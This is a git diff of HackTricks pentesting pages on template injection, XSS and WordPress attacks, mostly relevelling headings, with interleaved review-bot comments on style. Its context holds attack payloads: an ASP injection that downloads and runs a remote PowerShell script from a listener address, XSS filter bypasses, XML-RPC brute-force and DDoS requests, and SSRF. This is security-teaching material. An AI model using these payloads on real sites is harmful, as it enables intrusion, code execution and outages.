* Check [attr trick to bypass blacklisted chars in here](../../misc/basic-python/bypass-python-sandboxes/#python3).
-#### Mako (Python)
+### Mako (Python)
```python
<%
@@ -849,7 +843,7 @@ x=os.popen('id').read()
${x}
```
-#### Razor (.Net)
+### Razor (.Net)
* `@(2+2) <= Success`
* `@() <= Success`
@@ -869,7 +863,7 @@ ${x}
* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\)-in-ASP.NET-Razor/)
* [https://www.schtech.co.uk/razor-pages-ssti-rce/](https://www.schtech.co.uk/razor-pages-ssti-rce/)
-#### ASP
+### ASP
* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
@@ -880,11 +874,11 @@ ${x}
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
-**More Information**
+#### More Information
* [https://www.w3schools.com/asp/asp\_examples.asp](https://www.w3schools.com/asp/asp\_examples.asp)
-#### Mojolicious (Perl)
+### Mojolicious (Perl)
Even if it's perl it uses tags like ERB in Ruby.
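Review bot: the w3schools link in this hunk carries a backslash-escaped underscore inside the link target (`asp\_examples.asp`), a GitBook export artefact that some renderers emit as a literal backslash and break the URL; strip the backslash from the target (it is harmless in the link text). The Mojolicious lead-in also reads awkwardly, "Even if it's perl it uses tags like ERB in Ruby" could become "Although it is Perl, it uses ERB-style tags like Ruby".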
@@ -896,7 +890,7 @@ Even if it's perl it uses tags like ERB in Ruby.
<% perl code %>
```
-#### SSTI in GO
+### SSTI in GO
The way to confirm that the template engine used in the backed is Go you can use these payloads:
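Review bot: the sentence under the new `### SSTI in GO` heading has a typo and is ungrammatical ("the template engine used in the backed is Go you can use"); suggest "To confirm that the backend template engine is Go, use these payloads:". Since the heading line is already in the diff, fixing the sentence in the same commit is cheap.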
@@ -905,14 +899,14 @@ The way to confirm that the template engine used in the backed is Go you can use
* `{{printf "%s" "ssti" }}` = should output the string ssti in the response
* `{{html "ssti"}}`, `{{js "ssti"}}` = These are a few other payloads which should output the string "ssti" without the trailing words "js" or "html". You can refer to more keywords in the engine [here](https://golang.org/pkg/text/template).
-**XSS exploitation**
+#### XSS exploitation
If the server is **using the text/template** package, XSS is very easy to achieve by **simply** providing your **payload** as input. However, that is **not the case with html/template** as itHTMLencodes the response: `{{""}}` --> `<script>alert(1)</script>`
However, Go allows to **DEFINE** a whole **template** and then **later call it**. The payload will be something like:\
`{{define "T1"}}{{end}} {{template "T1"}}`
-**RCE Exploitation**
+#### RCE Exploitation
The documentation for both the html/template module can be found [here](https://golang.org/pkg/html/template/), and the documentation for the text/template module can be found [here](https://golang.org/pkg/text/template/), and yes, they do vary, a lot. For example, in **text/templat**e, you can **directly call any public function with the “call” value**, this however, is not the case with html/template.
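Review bot: the html/template example in this hunk's context is garbled and currently says the opposite of what it means: "itHTMLencodes" is missing spaces, and `{{""}}` --> `<script>alert(1)</script>` shows an empty payload producing a raw script tag, whereas the point is that html/template entity-escapes the injected markup. Likewise `{{define "T1"}}{{end}} {{template "T1"}}` has an empty define body, so the XSS markup that belongs between `define` and `end` has been lost; restore the payload and the escaped output, and fix the stray bold in "**text/templat**e".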
@@ -926,40 +920,41 @@ func (p Person) Secret (test string) string {
}
```
-**More information**
+#### More information
* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html)
* [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
-#### More Exploits
+### More Exploits
Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) for more exploits. Also you can find interesting tags information in [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
-### BlackHat PDF
+## BlackHat PDF
{% file src="../../.gitbook/assets/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf" %}
-### Related Help
+## Related Help
If you think it could be useful, read:
* [Flask tricks](../../pentesting/pentesting-web/flask.md)
* [Python magic functions](../../misc/basic-python/magic-methods.md)
-### Tools
+## Tools
{% embed url="https://github.com/epinna/tplmap" %}
-### Brute-Force Detection List
+## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
-### Practice & References
+## Practice & References
* [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
* [**https://portswigger.net/web-security/server-side-template-injection**](https://portswigger.net/web-security/server-side-template-injection)
+
Support HackTricks and get benefits!
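Review bot: the `## Practice & References` list repeats the `DiogoMRSilva/websitesVulnerableToSSTI` link that `### More Exploits` already gives a few lines above in the same hunk; drop one of them. The two PortSwigger entries point at different pages (`/exploiting` and the overview) so both can stay, but the second is bolded while the first is not; make the list formatting uniform.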
@@ -975,3 +970,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
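Review bot: this hunk only appends two empty lines after the last line of the SSTI page, and the same two trailing blank lines are added at the end of the XSS and WordPress files below. Nothing renders differently, so unless the build needs a terminating newline (in which case one is enough) these look like editor artefacts that will churn future diffs; drop them.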
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index c280536b..f72c1565 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -1,4 +1,4 @@
-# XSS (Cross Site Scripting)
+
@@ -16,9 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## XSS (Cross Site Scripting)
-### Methodology
+# XSS (Cross Site Scripting)
+
+## Methodology
1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code.
2. **Find the context** where it's reflected/used.
@@ -49,7 +50,7 @@ When working on a complex XSS you might find interesting to know about:
[debugging-client-side-js.md](debugging-client-side-js.md)
{% endcontent-ref %}
-### Reflected values
+## Reflected values
In order to successfully exploit a XSS the first thing you need to find is a **value controlled by you that is being reflected** in the web page.
@@ -57,16 +58,16 @@ In order to successfully exploit a XSS the first thing you need to find is a **v
* **Stored and reflected**: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a **Stored XSS**.
* **Accessed via JS**: If you find that a value controlled by you is being access using JS you could exploit a **DOM XSS**.
-### Contexts
+## Contexts
When trying to exploit a XSS the first thing you need to know if **where is your input being reflected**. Depending on the context, you will be able to execute arbitrary JS code on different ways.
-#### Raw HTML
+### Raw HTML
If your input is **reflected on the raw HTML** page you will need to abuse some **HTML tag** in order to execute JS code: ` #x #Access http://site.com/?#x t
```
-**Style events**
+#### Style events
```python
XSS
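Review bot: the new `#### Style events` heading sits on a code block fenced as ```python even though its content is an HTML payload (the `XSS` line is what remains of a tag in this view); use the ```markup fence the page already uses for HTML payloads elsewhere so syntax highlighting is not misleading. Also note that the raw-HTML example under `### Raw HTML` (` #x #Access http://site.com/?#x t`) has lost its tags in this rendering; confirm the committed file still has the complete payload.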
@@ -243,12 +244,12 @@ If you **cannot escape from the tag**, you could create new attributes inside th
```
-#### Within the attribute
+### Within the attribute
Even if you **cannot escape from the attribute** (`"` is being encoded or deleted), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.\
Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
-**Bypass inside event using HTML encoding/URL encode**
+#### **Bypass inside event using HTML encoding/URL encode**
The **HTML encoded characters** inside the value of HTML tags attributes are **decoded on runtime**. Therefore something like the following will be valid (the payload is in bold): `Go Back `
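Review bot: the new heading `#### **Bypass inside event using HTML encoding/URL encode**` keeps the bold markers inside the heading, while the sibling headings produced by this patch (e.g. `#### Bypass inside event using Unicode encode`) do not; drop the `**` so the heading style is uniform. The example sentence that follows ("the payload is in bold: `Go Back `") has also lost its markup in this view and needs checking in the file.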
@@ -275,7 +276,7 @@ Note that **any kind of HTML encode is valid**:
Click
```
-**Bypass inside event using Unicode encode**
+#### Bypass inside event using Unicode encode
```javascript
//For some reason you can use unicode to encode "alert" but not "(1)"
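Review bot: the comment "For some reason you can use unicode to encode alert but not (1)" under the new heading can state the actual reason: `\uXXXX` escapes are only valid inside identifiers and string literals in JavaScript, so `\u0061lert` is parsed as the identifier `alert`, while punctuators such as `(` and `)` cannot be written as escapes. Replacing the comment with that sentence makes the trick predictable instead of magic.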
@@ -283,7 +284,7 @@ Note that **any kind of HTML encode is valid**:
```
-#### Special Protocols Within the attribute
+### Special Protocols Within the attribute
There you can use the protocols **`javascript:`** or **`data:`** in some places to **execute arbitrary JS code**. Some will require user interaction on some won't.
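Review bot: the paragraph under `### Special Protocols Within the attribute` has a typo that flips its meaning, "Some will require user interaction on some won't" should read "some will require user interaction and some won't", and "There you can use" should be "Here you can use". Worth fixing while the heading line is already touched.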
@@ -307,7 +308,7 @@ data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
```
-**Places where you can inject these protocols**
+#### Places where you can inject these protocols
**In general** the `javascript:` protocol can be **used in any tag that accepts the attribute `href`** and in **most** of the tags that accepts the **attribute `src`** (but not `
```
-**Other obfuscation tricks**
+#### Other obfuscation tricks
_**In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.**_
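Review bot: the sentence after the new `#### Places where you can inject these protocols` heading is cut off at "(but not `", so the tag that is excluded from the `src` rule is missing in this view; confirm the committed line still names it, otherwise the rule is incomplete. The `data:image/svg+xml;base64,...` payload above contains spaces inside the base64; browsers strip ASCII whitespace when decoding data URLs so it still works, but a comment saying so would stop readers from "fixing" it.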
@@ -349,7 +350,7 @@ Moreover, there is another **nice trick** for these cases\*\*: Even if your inpu
Note that if you try to **use both** `URLencode + HTMLencode` in any order to encode the **payload** it **won't** **work**, but you can **mix them inside the payload**.
-**Using Hex and Octal encode with `javascript:`**
+#### Using Hex and Octal encode with `javascript:`
You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe` (at least) to declare **HTML tags to execute JS**:
@@ -365,7 +366,7 @@ You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe`
```
-#### Reverse tab nabbing
+### Reverse tab nabbing
```javascript
alert(1)">
```
-#### JavaScript bypass blacklists techniques
+### JavaScript bypass blacklists techniques
-**Strings**
+#### Strings
```javascript
"thisisastring"
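Review bot: the `### Reverse tab nabbing` section in this hunk appears to have no body in this rendering apart from a ```javascript block containing `alert(1)">`, which is an HTML attribute-closing fragment rather than JavaScript; check that the `<a target="_blank" ...>` example survived in the file and fence it as ```markup like the other HTML payloads. The `### JavaScript bypass blacklists techniques` / `#### Strings` relevels are consistent.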
@@ -500,14 +501,14 @@ atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))
```
-**Space substitutions inside JS code**
+#### Space substitutions inside JS code
```javascript
/**/
```
-**JavaScript without parentheses**
+#### JavaScript without parentheses
```javascript
alert`1`
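Review bot: the context line `eval(8680439..toString(30))(983801..toString(36))` would benefit from a decoding comment under the new headings, since `8680439..toString(30)` is `"alert"` and `983801..toString(36)` is `"l33t"`, which is why the expression pops `alert("l33t")`. The `#### Space substitutions inside JS code` block only shows `/**/` here; verify the other substitutions (newlines, etc.) were not dropped.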
@@ -519,7 +520,7 @@ eval.apply`${[`alert\x2823\x29`]}`
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
-**JavaScript comments (from** [**JavaScript Comments**](./#javascript-comments) **trick)**
+#### JavaScript comments (from [JavaScript Comments](./#javascript-comments) trick)
```javascript
//This is a 1 line comment
@@ -528,7 +529,7 @@ eval.apply`${[`alert\x2823\x29`]}`
-->This is a 1 line comment, but "-->" must to be at the beggining of the line
```
-**JavaScript new lines (from** [**JavaScript new line**](./#javascript-new-lines) **trick)**
+#### JavaScript new lines (from [JavaScript new line](./#javascript-new-lines) trick)
```javascript
//Javascript interpret as new line these chars:
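Review bot: the comment-trick context line has two typos, "must to be at the beggining" should be "must be at the beginning"; it is otherwise correct, since `-->` is only treated as a single-line comment when it starts a line (Annex B HTML-like comments). Fix the wording while the adjacent heading is being changed.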
@@ -538,7 +539,7 @@ String.fromCharCode(8232) //0xe2 0x80 0xa8
String.fromCharCode(8233) //0xe2 0x80 0xa8
```
-**Arbitrary function (alert) call**
+#### Arbitrary function (alert) call
````javascript
//Eval like functions
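Review bot: the byte sequence in the context line `String.fromCharCode(8233) //0xe2 0x80 0xa8` is wrong: 8233 is U+2029 (PARAGRAPH SEPARATOR), whose UTF-8 encoding is `0xe2 0x80 0xa9`; `0xe2 0x80 0xa8` is U+2028 (LINE SEPARATOR), the line above. Anyone building a raw-byte payload from this comment would send the wrong character.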
@@ -599,7 +600,7 @@ top[8680439..toString(30)](1)
````
-### **DOM vulnerabilities**
+## **DOM vulnerabilities**
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.\
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:**
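Review bot: `## **DOM vulnerabilities**` keeps bold inside the heading, unlike the other H2s this patch produces (`## Other Bypasses`, `## XSS resources`); drop the `**`. The sentence below, "There is JS code that is using unsafely data controlled by an attacker like location.href . An attacker, could abuse this", should read "Some JS code uses attacker-controlled data such as `location.href` unsafely; an attacker can abuse this to execute arbitrary JS".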
@@ -611,19 +612,19 @@ There is **JS code** that is using **unsafely data controlled by an attacker** l
There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.\
Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
-### Other Bypasses
+## Other Bypasses
-#### Normalised Unicode
+### Normalised Unicode
You could check is the **reflected values** are being **unicode normalized** in the server (or in the client side) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-normalization-vulnerability.md#xss-cross-site-scripting).
-#### PHP FILTER\_VALIDATE\_EMAIL flag Bypass
+### PHP FILTER\_VALIDATE\_EMAIL flag Bypass
```javascript
">"@x.y
```
-#### Ruby-On-Rails bypass
+### Ruby-On-Rails bypass
Due to **RoR mass assignment** quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields (onfocus) can be added inside the tag.\
Form example ([from this report](https://hackerone.com/reports/709336)), if you send the payload:
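Review bot: several context lines in this hunk need small fixes: "You could check is the reflected values" should be "check if the reflected values", "additoinal fields" is "additional fields", and "Form example" is "For example". The `### PHP FILTER_VALIDATE_EMAIL flag Bypass` payload is fenced as ```javascript although it is an e-mail-shaped HTML injection (`">"@x.y`), and the tag content between the quotes appears to have been stripped here; use ```markup and verify the full payload is in the file.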
@@ -644,7 +645,7 @@ Then, the onfocus attribute will be inserted:
A XSS occurs.
-#### Special combinations
+### Special combinations
```markup
```
-### XSS resources
+## XSS resources
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)\
[http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list) [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list) [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)\
[https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
-#### XSS TOOLS
+### XSS TOOLS
Find some [**tools for XSS here**](xss-tools.md)**.**
+
Support HackTricks and get benefits!
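Review bot: the ```markup block under the new `### Special combinations` heading is empty in this view (open fence immediately followed by the close), so either the payloads were lost or the section has no content; check the file. In `## XSS resources`, five links are run together on one line separated by spaces; turn them into a bullet list like the reference lists elsewhere on the page, and "A XSS occurs." should be "An XSS occurs."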
@@ -1095,3 +1097,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md
index c0772009..355da97a 100644
--- a/pentesting/pentesting-web/wordpress.md
+++ b/pentesting/pentesting-web/wordpress.md
@@ -1,4 +1,4 @@
-# Wordpress
+
@@ -16,9 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Wordpress
-### Basic Information
+# Wordpress
+
+## Basic Information
**Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\
\_\_**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in\*\*:\*\* [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
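Review bot: the paragraph right after the new `## Basic Information` heading still carries export artefacts: a leading `\_\_` and `in\*\*:\*\*` are escaped underscores/asterisks left by the GitBook export and render as literal characters; remove them and write the sentence plainly ("Theme files live in `/wp-content/themes/`, so if you modify a theme PHP file to get RCE you will use that path, e.g. twentytwelve's `/wp-content/themes/twentytwelve/404.php`").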
@@ -28,7 +29,7 @@ In **wp-config.php** you can find the root password of the database.
Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
-#### **Main WordPress Files**
+### **Main WordPress Files**
* `index.php`
* `license.txt` contains useful information such as the version WordPress installed.
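Review bot: the hunk header context "In wp-config.php you can find the root password of the database" overstates it; `wp-config.php` holds the credentials of the database user WordPress connects with, which is often, but not necessarily, root. Suggest "the database credentials". `### **Main WordPress Files**` also keeps bold in the heading; drop it for consistency with the plain headings this patch creates.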
@@ -43,11 +44,11 @@ Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admi
* `wp-content/uploads/` Is the directory where any files uploaded to the platform are stored.
* `wp-includes/` This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
-**Post exploitation**
+#### Post exploitation
* The `wp-config.php` file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
-#### Users Permissions
+### Users Permissions
* **Administrator**
* **Editor**: Publish and manages his and others posts
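Review bot: promoting `**Post exploitation**` to `#### Post exploitation` creates a heading with the same text as the later `## Post Exploitation` section (mysql credential extraction), which yields a duplicate anchor slug and a confusing table of contents; since this subsection is a single bullet about `wp-config.php`, either fold it into the file list above or rename it (e.g. `#### wp-config.php`).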
@@ -55,9 +56,9 @@ Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admi
* **Contributor**: Write and manage his posts but cannot publish them
* **Subscriber**: Browser posts and edit their profile
-### **Passive Enumeration**
+## **Passive Enumeration**
-#### **Get WordPress version**
+### **Get WordPress version**
Check if you can find the files `/license.txt` or `/readme.html`
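Review bot: "**Subscriber**: Browser posts and edit their profile" should be "Browse posts and edit their profile", and "Publish and manages his and others posts" is "Publishes and manages their own and others' posts"; the role list is the kind of thing copied into reports, so it is worth getting the wording right while the headings around it are being relevelled. The `## **Passive Enumeration**` / `### **Get WordPress version**` headings keep bold markers; drop them.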
@@ -75,33 +76,33 @@ Inside the **source code** of the page (example from [https://wordpress.org/supp
![](<../../.gitbook/assets/image (346).png>)
-#### Get Plugins
+### Get Plugins
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
-#### Get Themes
+### Get Themes
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
-#### Extract versions in general
+### Extract versions in general
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
-### Active enumeration
+## Active enumeration
-#### Plugins and Themes
+### Plugins and Themes
You probably won't be able to find all the Plugins and Themes passible. In order to discover all of them, you will need to **actively Brute Force a list of Plugins and Themes** (hopefully for us there are automated tools that contains this lists).
-#### Users
+### Users
-**ID Brute**
+#### ID Brute
You get valid users from a WordPress site by Brute Forcing users IDs:
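Review bot: the "Extract versions in general" command uses `grep -E '?ver='`, and a leading `?` is not a portable ERE (POSIX leaves it undefined, GNU grep tolerates it); use `grep -F '?ver='` or `grep -E '\?ver='` so the intent is explicit. Under `### Plugins and Themes`, "passible" should be "possible" and "automated tools that contains this lists" should be "automated tools that contain these lists".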
@@ -111,7 +112,7 @@ curl -s -I -X GET http://blog.example.com/?author=1
If the responses are **200** or **30X**, that means that the id is **valid**. If the the response is **400**, then the id is **invalid**.
-**wp-json**
+#### wp-json
You can also try to get information about the users by querying:
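Review bot: the ID-brute context has "If the the response is 400" (doubled "the"); more importantly, verify the status code, because a non-existent author archive on WordPress is normally answered with 404, not 400, so readers keying on 400 will mark every ID as valid. Wording such as "a 200 or 30X means the ID exists; a 4xx means it does not" avoids the trap.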
@@ -123,13 +124,13 @@ curl http://blog.example.com/wp-json/wp/v2/users
Also note that _**/wp-json/wp/v2/pages** could leak IP addresses\*\*.\*\*_
-#### XML-RPC
+### XML-RPC
If `xml-rpc.php` is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example).
To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
-**Check**
+#### Check
```markup
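Review bot: the XML-RPC section names the file inconsistently: the first sentence says `xml-rpc.php` while the next one (and the rest of the page) uses `/xmlrpc.php`; the actual file is `xmlrpc.php`, so fix the first mention. The preceding line also has a leftover `\*\*.\*\*` escape artefact after "IP addresses", and "launch DoS attacks to other resources" should be "against other resources".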
@@ -140,7 +141,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)
-**Credentials Bruteforce**
+#### Credentials Bruteforce
_**wp.getUserBlogs**_, \_**wp.getCategories** \_ or _**metaWeblog.getUsersBlogs**_ are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
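Review bot: the method list under the new `#### Credentials Bruteforce` heading has stray escapes around the second method (`\_**wp.getCategories** \_`) that render as literal underscores; format it like the other two. The screenshot above is hot-linked from an external wordpress.com blog (`h3llwings.files.wordpress.com`); host it under `.gitbook/assets` like the other images so the page does not lose it when that blog changes.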
@@ -160,11 +161,11 @@ Also there is a **faster way** to brute-force credentials using **`system.multic
![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2FFX0g2BLsdfdQnq1xXx3N%2Ffile.jpeg?alt=media)
-**Bypass 2FA**
+#### Bypass 2FA
This method is meant for programs and not for humans, and old, therefore it doesn't support 2FA. So, if you have valid creds but the main entrance is protected by 2FA, **you might be able to abuse xmlrpc.php to login with those creds bypassing 2FA**. Note that you won't me able to perform all the actions you can do through the console, but you might still be able to get to RCE as Ippsec explains it in [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
-**DDoS or port scanning**
+#### DDoS or port scanning
If you can find the method _**pingback.ping**_ inside the list you can make the Wordpress send an arbitrary request to any host/port.\
This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** (so a **DDoS** is caused in that location) or you can use it to make **Wordpress** lo **scan** some internal **network** (you can indicate any port).
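Review bot: two typos in the context under the new headings: "Note that you won't me able" should be "won't be able", and "make Wordpress lo scan some internal network" should be "make WordPress scan an internal network". The firebase image URL above contains `\_` escapes inside the link target, which may break the image in renderers that do not unescape link URLs.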
@@ -185,7 +186,7 @@ If you get **faultCode** with a value **greater** then **0** (17), it means the
Take a look to the use of \*\*`system.multicall`\*\*in the previous section to learn how to abuse this method to cause DDoS.
-#### wp-cron.php DoS
+### wp-cron.php DoS
This file usually exists under the root of the Wordpress site: `/wp-cron.php`\
When this file is **accessed** a "**heavy**" MySQL **query** is performed, so I could be used by **attackers** to **cause** a **DoS**.\
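Review bot: the context line "Take a look to the use of \*\*`system.multicall`\*\*in the previous section" has escaped bold markers and a missing space, and the wp-cron paragraph says "so I could be used by attackers", which should be "so it could be used by attackers". The hunk header also shows "greater then 0", which should be "greater than 0".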
@@ -193,7 +194,7 @@ Also, by default, the `wp-cron.php` is called on every page load (anytime a clie
It is recommended to disable Wp-Cron and create a real cronjob inside the host that perform the needed actions in a regular interval (without causing issues).
-**Bruteforce**
+#### **Bruteforce**
```markup
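Review bot: after this relevel, `#### **Bruteforce**` (and the `#### DDOS` a few hunks down) become children of `### wp-cron.php DoS`, but their bodies are XML-RPC requests (the multicall brute force and the `wp.uploadFile` context that follows), so they belong under `### XML-RPC`; move the wp-cron subsection after them or make these `###` siblings. Drop the `**` inside the heading too. The recommendation paragraph could name the concrete setting, `define('DISABLE_WP_CRON', true);` in `wp-config.php` plus a system cron hitting `wp-cron.php`.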
@@ -205,7 +206,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
```
-![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (102).png>)
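Review bot: this hunk only changes the image reference from `image (107) (2) ... (1) (1) (1).png` to a name with one fewer `(1)`; make sure the asset with the new name actually exists in `.gitbook/assets` (GitBook renames duplicates by appending `(1)`), otherwise the screenshot silently breaks.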
@@ -241,7 +242,7 @@ Using the correct credentials you can upload a file. In the response the path wi
```
-**DDOS**
+#### DDOS
```markup
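Review bot: the new heading is `#### DDOS` while the related heading earlier in the same file is `#### DDoS or port scanning`; use `DDoS` consistently. As noted for the Bruteforce subsection, this XML-RPC payload now sits under `### wp-cron.php DoS` after the relevel, which is the wrong parent.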
@@ -255,7 +256,7 @@ Using the correct credentials you can upload a file. In the response the path wi
![](<../../.gitbook/assets/image (103).png>)
-#### /wp-json/oembed/1.0/proxy - SSRF
+### /wp-json/oembed/1.0/proxy - SSRF
Try to access _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ and the Worpress site may make a request to you.
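Review bot: the oEmbed SSRF example under the new `### /wp-json/oembed/1.0/proxy - SSRF` heading hard-codes a specific Collaborator hostname (`ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net`), which is meaningless for other readers; replace it with a placeholder such as `<your-collaborator-id>.burpcollaborator.net`. "worpress-site.com" and "the Worpress site" are both misspelled.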
@@ -263,13 +264,13 @@ This is the response when it doesn't work:
![](<../../.gitbook/assets/image (184).png>)
-#### SSRF
+### SSRF
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them.
-#### Automatic Tools
+### Automatic Tools
```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
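Review bot: relevelling produces two adjacent sibling sections, `### /wp-json/oembed/1.0/proxy - SSRF` and `### SSRF`, the second of which is only the quickpress embed; fold the tool under the first heading (or title it "SSRF tooling") rather than keeping a near-duplicate heading. The sentence "This tool checks if the methodName: pingback.ping and for the path ... and if exists" should read "This tool checks whether the `pingback.ping` method and the `/wp-json/oembed/1.0/proxy` endpoint exist and, if so, tries to exploit them."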
@@ -277,9 +278,9 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
-### **Panel RCE**
+## **Panel RCE**
-**Modifying a php from the theme used (admin credentials needed)**
+#### **Modifying a php from the theme used (admin credentials needed)**
